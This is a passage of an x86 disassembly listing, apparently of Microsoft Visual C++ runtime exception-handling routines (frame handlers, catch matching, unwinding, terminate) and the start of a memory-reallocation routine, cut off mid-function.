call sub_434C1A
add esp, 0Ch
test eax, eax
jz short loc_431352
loc_43134D: ; CODE XREF: sub_4312E3+51�j
; sub_4312E3+59�j
add esi, 4
jmp short loc_431325
; ---------------------------------------------------------------------------
loc_431352: ; CODE XREF: sub_4312E3+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_43135C
; ---------------------------------------------------------------------------
loc_43135A: ; CODE XREF: sub_4312E3+10�j
; sub_4312E3+1C�j ...
xor eax, eax
loc_43135C: ; CODE XREF: sub_4312E3+75�j
pop edi
pop esi
pop ebx
retn
sub_4312E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431360 proc near ; CODE XREF: .text:0042B597�p
; sub_42B600+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_431376
call sub_431C2D
loc_431376: ; CODE XREF: sub_431360+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_43139E
cmp dword ptr [esi+4], 0
jz short loc_4313F4
cmp [ebp+arg_14], 0
jnz short loc_4313F4
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_4316B5
add esp, 10h
jmp short loc_4313F4
; ---------------------------------------------------------------------------
loc_43139E: ; CODE XREF: sub_431360+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_4313F4
cmp dword ptr [eax], 0E06D7363h
jnz short loc_4313D8
cmp [eax+14h], edi
jbe short loc_4313D8
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_4313D8
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_4313F7
; ---------------------------------------------------------------------------
loc_4313D8: ; CODE XREF: sub_431360+4A�j
; sub_431360+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_4313FB
add esp, 20h
loc_4313F4: ; CODE XREF: sub_431360+23�j
; sub_431360+29�j ...
push 1
pop eax
loc_4313F7: ; CODE XREF: sub_431360+76�j
pop edi
pop esi
pop ebp
retn
sub_431360 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4313FB proc near ; CODE XREF: sub_431360+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_43141B
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_431420
loc_43141B: ; CODE XREF: sub_4313FB+16�j
call sub_431C2D
loc_431420: ; CODE XREF: sub_4313FB+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_431583
cmp dword ptr [esi+10h], 3
jnz short loc_4314A0
cmp [esi+14h], edi
jnz short loc_4314A0
cmp dword ptr [esi+1Ch], 0
jnz short loc_4314A0
call sub_42E4EE
cmp dword ptr [eax+6Ch], 0
jz loc_43157E
call sub_42E4EE
mov esi, [eax+6Ch]
call sub_42E4EE
mov eax, [eax+70h]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_434CC7
pop ecx
test eax, eax
pop ecx
jnz short loc_431482
call sub_431C2D
loc_431482: ; CODE XREF: sub_4313FB+80�j
cmp [esi], ebx
jnz loc_431583
cmp dword ptr [esi+10h], 3
jnz short loc_4314A0
cmp [esi+14h], edi
jnz short loc_4314A0
cmp dword ptr [esi+1Ch], 0
jnz short loc_4314A0
call sub_431C2D
loc_4314A0: ; CODE XREF: sub_4313FB+41�j
; sub_4313FB+46�j ...
cmp [esi], ebx
jnz loc_431583
cmp dword ptr [esi+10h], 3
jnz loc_431583
cmp [esi+14h], edi
jnz loc_431583
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_42B750
add esp, 14h
mov ebx, eax
loc_4314D7: ; CODE XREF: sub_4313FB+16E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_43156E
cmp [ebx], edi
jg short loc_431563
cmp edi, [ebx+4]
jg short loc_431563
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_431560
loc_4314FC: ; CODE XREF: sub_4313FB+13D�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_43152D
loc_43150E: ; CODE XREF: sub_4313FB+130�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_431658
add esp, 0Ch
test eax, eax
jnz short loc_43153C
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_43150E
loc_43152D: ; CODE XREF: sub_4313FB+111�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_4314FC
jmp short loc_431560
; ---------------------------------------------------------------------------
loc_43153C: ; CODE XREF: sub_4313FB+125�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_431769
add esp, 2Ch
loc_431560: ; CODE XREF: sub_4313FB+FF�j
; sub_4313FB+13F�j
mov edi, [ebp+var_10]
loc_431563: ; CODE XREF: sub_4313FB+EA�j
; sub_4313FB+EF�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_4314D7
; ---------------------------------------------------------------------------
loc_43156E: ; CODE XREF: sub_4313FB+E2�j
cmp [ebp+arg_14], 0
jz short loc_43157E
push 1
push esi
call sub_431AED
pop ecx
pop ecx
loc_43157E: ; CODE XREF: sub_4313FB+57�j
; sub_4313FB+177�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_431583: ; CODE XREF: sub_4313FB+37�j
; sub_4313FB+89�j ...
cmp [ebp+arg_14], 0
jnz short loc_4315A9
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4315AE
add esp, 20h
jmp short loc_43157E
; ---------------------------------------------------------------------------
loc_4315A9: ; CODE XREF: sub_4313FB+18C�j
jmp sub_431BCC
sub_4313FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4315AE proc near ; CODE XREF: sub_4313FB+1A4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call sub_42E4EE
cmp dword ptr [eax+68h], 0
jz short loc_4315E1
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B625
add esp, 1Ch
test eax, eax
jnz short loc_431654
loc_4315E1: ; CODE XREF: sub_4315AE+10�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_42B750
add esp, 14h
mov esi, eax
loc_4315FD: ; CODE XREF: sub_4315AE+A4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_431654
cmp edi, [esi]
jl short loc_43164C
cmp edi, [esi+4]
jg short loc_43164C
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_431626
cmp byte ptr [ecx+8], 0
jnz short loc_43164C
loc_431626: ; CODE XREF: sub_4315AE+70�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_431769
add esp, 2Ch
loc_43164C: ; CODE XREF: sub_4315AE+59�j
; sub_4315AE+5E�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_4315FD
; ---------------------------------------------------------------------------
loc_431654: ; CODE XREF: sub_4315AE+31�j
; sub_4315AE+55�j
pop edi
pop esi
leave
retn
sub_4315AE endp
; =============== S U B R O U T I N E =======================================
sub_431658 proc near ; CODE XREF: sub_4313FB+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_4316AF
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_4316AF
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_431689
add ecx, 8
push ecx
push edx
call sub_42B260
pop ecx
test eax, eax
pop ecx
jnz short loc_4316AB
loc_431689: ; CODE XREF: sub_431658+1F�j
test byte ptr [esi], 2
jz short loc_431693
test byte ptr [edi], 8
jz short loc_4316AB
loc_431693: ; CODE XREF: sub_431658+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_4316A2
test byte ptr [edi], 1
jz short loc_4316AB
loc_4316A2: ; CODE XREF: sub_431658+43�j
test al, 2
jz short loc_4316AF
test byte ptr [edi], 2
jnz short loc_4316AF
loc_4316AB: ; CODE XREF: sub_431658+2F�j
; sub_431658+39�j ...
xor eax, eax
jmp short loc_4316B2
; ---------------------------------------------------------------------------
loc_4316AF: ; CODE XREF: sub_431658+B�j
; sub_431658+14�j ...
push 1
pop eax
loc_4316B2: ; CODE XREF: sub_431658+55�j
pop edi
pop esi
retn
sub_431658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4316B5 proc near ; CODE XREF: sub_431360+34�p
; sub_431769+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376C0
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_4316E7: ; CODE XREF: sub_4316B5+8A�j
cmp esi, [ebp+arg_C]
jz short loc_431741
cmp esi, 0FFFFFFFFh
jle short loc_4316F6
cmp esi, [edi+4]
jl short loc_4316FB
loc_4316F6: ; CODE XREF: sub_4316B5+3A�j
call sub_431C2D
loc_4316FB: ; CODE XREF: sub_4316B5+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_431716
push 103h
push ebx
push eax
call sub_431B80
loc_431716: ; CODE XREF: sub_4316B5+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_431736
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_431753
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_431736: ; CODE XREF: sub_4316B5+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_4316E7
; ---------------------------------------------------------------------------
loc_431741: ; CODE XREF: sub_4316B5+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4316B5 endp
; =============== S U B R O U T I N E =======================================
sub_431753 proc near ; CODE XREF: sub_4316B5+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_431764
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_431764: ; CODE XREF: sub_431753+C�j
jmp sub_431BCC
sub_431753 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431769 proc near ; CODE XREF: sub_4313FB+15D�p
; sub_4315AE+96�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_43178B
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_431929
add esp, 10h
loc_43178B: ; CODE XREF: sub_431769+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_431797
push edi
jmp short loc_43179A
; ---------------------------------------------------------------------------
loc_431797: ; CODE XREF: sub_431769+29�j
push [ebp+arg_24]
loc_43179A: ; CODE XREF: sub_431769+2C�j
call sub_42B527
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_4316B5
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_4317E4
add esp, 2Ch
test eax, eax
jz short loc_4317DF
push edi
push eax
call sub_42B4E5
loc_4317DF: ; CODE XREF: sub_431769+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_431769 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4317E4 proc near ; CODE XREF: sub_431769+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376D0
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_10]
mov [ebp+var_2C], ebx
and [ebp+var_24], 0
mov esi, [ebp+arg_4]
mov eax, [esi-4]
mov [ebp+var_28], eax
call sub_42E4EE
mov eax, [eax+6Ch]
mov [ebp+var_1C], eax
call sub_42E4EE
mov eax, [eax+70h]
mov [ebp+var_20], eax
call sub_42E4EE
mov edi, [ebp+arg_0]
mov [eax+6Ch], edi
call sub_42E4EE
mov ecx, [ebp+arg_8]
mov [eax+70h], ecx
and [ebp+var_4], 0
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push ebx
push [ebp+arg_C]
push esi
call sub_42B5AC
add esp, 14h
mov [ebp+var_2C], eax
and [ebp+var_4], 0
or [ebp+var_4], 0FFFFFFFFh
call sub_4318B1
mov eax, [ebp+var_2C]
loc_43187A: ; CODE XREF: sub_431893+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4317E4 endp
; =============== S U B R O U T I N E =======================================
sub_431889 proc near ; DATA XREF: .text:004376E0�o
push dword ptr [ebp-14h]
call sub_4318FF
pop ecx
retn
sub_431889 endp
; =============== S U B R O U T I N E =======================================
sub_431893 proc near ; DATA XREF: .text:004376E4�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_42AD0E
pop ecx
pop ecx
xor eax, eax
jmp short loc_43187A
sub_431893 endp
; ---------------------------------------------------------------------------
loc_4318AB: ; DATA XREF: .text:004376D8�o
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
; =============== S U B R O U T I N E =======================================
sub_4318B1 proc near ; CODE XREF: sub_4317E4+8E�p
mov eax, [ebp-28h]
mov [esi-4], eax
call sub_42E4EE
mov ecx, [ebp-1Ch]
mov [eax+6Ch], ecx
call sub_42E4EE
mov ecx, [ebp-20h]
mov [eax+70h], ecx
cmp dword ptr [edi], 0E06D7363h
jnz short locret_4318FE
cmp dword ptr [edi+10h], 3
jnz short locret_4318FE
cmp dword ptr [edi+14h], 19930520h
jnz short locret_4318FE
cmp dword ptr [ebp-24h], 0
jnz short locret_4318FE
cmp dword ptr [ebp-2Ch], 0
jz short locret_4318FE
call sub_42AD76
push eax
push edi
call sub_431AED
pop ecx
pop ecx
locret_4318FE: ; CODE XREF: sub_4318B1+22�j
; sub_4318B1+28�j ...
retn
sub_4318B1 endp
; =============== S U B R O U T I N E =======================================
sub_4318FF proc near ; CODE XREF: sub_431889+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_431926
cmp dword ptr [eax+10h], 3
jnz short loc_431926
cmp dword ptr [eax+14h], 19930520h
jnz short loc_431926
cmp dword ptr [eax+1Ch], 0
jnz short loc_431926
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431926: ; CODE XREF: sub_4318FF+C�j
; sub_4318FF+12�j ...
xor eax, eax
retn
sub_4318FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431929 proc near ; CODE XREF: sub_431769+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376E8
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_431AD2
cmp byte ptr [eax+8], 0
jz loc_431AD2
mov eax, [ecx+8]
test eax, eax
jz loc_431AD2
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_4319C6
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_434CC7
pop ecx
pop ecx
test eax, eax
jz loc_431AC9
push 1
push edi
call sub_434CE3
pop ecx
pop ecx
test eax, eax
jz loc_431AC9
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_4319B7: ; CODE XREF: sub_431929+F5�j
push eax
call sub_431B54
pop ecx
pop ecx
mov [edi], eax
jmp loc_431ACE
; ---------------------------------------------------------------------------
loc_4319C6: ; CODE XREF: sub_431929+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_431A20
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_434CC7
pop ecx
pop ecx
test eax, eax
jz loc_431AC9
push 1
push edi
call sub_434CE3
pop ecx
pop ecx
test eax, eax
jz loc_431AC9
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_42BA90
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_431ACE
mov eax, [edi]
test eax, eax
jz loc_431ACE
add esi, 8
push esi
jmp short loc_4319B7
; ---------------------------------------------------------------------------
loc_431A20: ; CODE XREF: sub_431929+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_431A68
call sub_434CC7
pop ecx
pop ecx
test eax, eax
jz loc_431AC9
push 1
push edi
call sub_434CE3
pop ecx
pop ecx
test eax, eax
jz short loc_431AC9
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_431B54
pop ecx
pop ecx
push eax
push edi
call sub_42BA90
add esp, 0Ch
jmp short loc_431ACE
; ---------------------------------------------------------------------------
loc_431A68: ; CODE XREF: sub_431929+103�j
call sub_434CC7
pop ecx
pop ecx
test eax, eax
jz short loc_431AC9
push 1
push edi
call sub_434CE3
pop ecx
pop ecx
test eax, eax
jz short loc_431AC9
push dword ptr [esi+18h]
call sub_434CFF
pop ecx
test eax, eax
jz short loc_431AC9
test byte ptr [esi], 4
jz short loc_431AAF
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_431B54
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_42B520
jmp short loc_431ACE
; ---------------------------------------------------------------------------
loc_431AAF: ; CODE XREF: sub_431929+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_431B54
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_42B519
jmp short loc_431ACE
; ---------------------------------------------------------------------------
loc_431AC9: ; CODE XREF: sub_431929+6A�j
; sub_431929+7C�j ...
call sub_431C2D
loc_431ACE: ; CODE XREF: sub_431929+98�j
; sub_431929+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_431AD2: ; CODE XREF: sub_431929+2E�j
; sub_431929+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_431929 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_431BCC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431AED proc near ; CODE XREF: sub_4313FB+17C�p
; sub_4318B1+46�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4376F8
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_431B34
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_431B34
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_42B519
or [ebp+var_4], 0FFFFFFFFh
loc_431B34: ; CODE XREF: sub_431AED+2A�j
; sub_431AED+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_431AED endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_431BCC
; =============== S U B R O U T I N E =======================================
sub_431B54 proc near ; CODE XREF: sub_431929+8F�p
; sub_431929+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_431B75
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_431B75: ; CODE XREF: sub_431B54+12�j
pop esi
retn
sub_431B54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431B80 proc near ; CODE XREF: sub_42B5AC+40�p
; sub_4316B5+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_42AD99
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_431BBF
mov ecx, 2
loc_431BBF: ; CODE XREF: sub_431B80+38�j
push ecx
call sub_42AD99
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_431B80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431BCC proc near ; CODE XREF: sub_4313FB:loc_4315A9�j
; sub_431753:loc_431764�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00434D17 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437708
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor esi, esi
mov [ebp+var_4], esi
call sub_42E4EE
cmp [eax+60h], esi
jz short loc_431C1F
mov [ebp+var_4], 1
call sub_42E4EE
call dword ptr [eax+60h]
mov [ebp+var_4], esi
jmp short loc_431C1F
; ---------------------------------------------------------------------------
loc_431C14: ; DATA XREF: .text:00437718�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431C18: ; DATA XREF: .text:0043771C�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_431C1F: ; CODE XREF: sub_431BCC+32�j
; sub_431BCC+46�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_431C28: ; DATA XREF: .text:00437710�o
jmp loc_434D17
sub_431BCC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431C2D proc near ; CODE XREF: sub_42B750+23�p
; sub_42B750:loc_42B7BB�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437720
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_4538E0
test eax, eax
jz short loc_431C75
mov [ebp+var_4], 1
call eax ; sub_431BCC
jmp short loc_431C71
; ---------------------------------------------------------------------------
loc_431C6A: ; DATA XREF: .text:00437730�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_431C6E: ; DATA XREF: .text:00437734�o
mov esp, [ebp+var_18]
loc_431C71: ; CODE XREF: sub_431C2D+3B�j
and [ebp+var_4], 0
loc_431C75: ; CODE XREF: sub_431C2D+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_431C7E: ; DATA XREF: .text:00437728�o
jmp sub_431BCC
sub_431C2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431C83 proc near ; CODE XREF: sub_42B7EB+39�p
; sub_435D8D+ED�p ...
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00431E17 SIZE 0000013F BYTES
; FUNCTION CHUNK AT 00431F67 SIZE 0000004B BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437738
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 28h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
jnz short loc_431CBD
push [ebp+arg_4]
call sub_4297B8
pop ecx
jmp loc_431FA3
; ---------------------------------------------------------------------------
loc_431CBD: ; CODE XREF: sub_431C83+2A�j
mov esi, [ebp+arg_4]
cmp esi, edi
jnz short loc_431CD0
push ebx
call sub_4298F2
pop ecx
jmp loc_431FA1
; ---------------------------------------------------------------------------
loc_431CD0: ; CODE XREF: sub_431C83+3F�j
mov eax, dword_677004
cmp eax, 3
jnz loc_431E17
loc_431CDE: ; CODE XREF: sub_431C83+178�j
mov [ebp+var_24], edi
cmp esi, 0FFFFFFE0h
ja loc_431DDB
push 9
call sub_42DAEF
pop ecx
mov [ebp+var_4], edi
push ebx
call sub_42C8FA
pop ecx
mov [ebp+var_28], eax
cmp eax, edi
jz loc_431DAB
cmp esi, dword_676FFC
ja short loc_431D5B
push esi
push ebx
push eax
call sub_42D103
add esp, 0Ch
test eax, eax
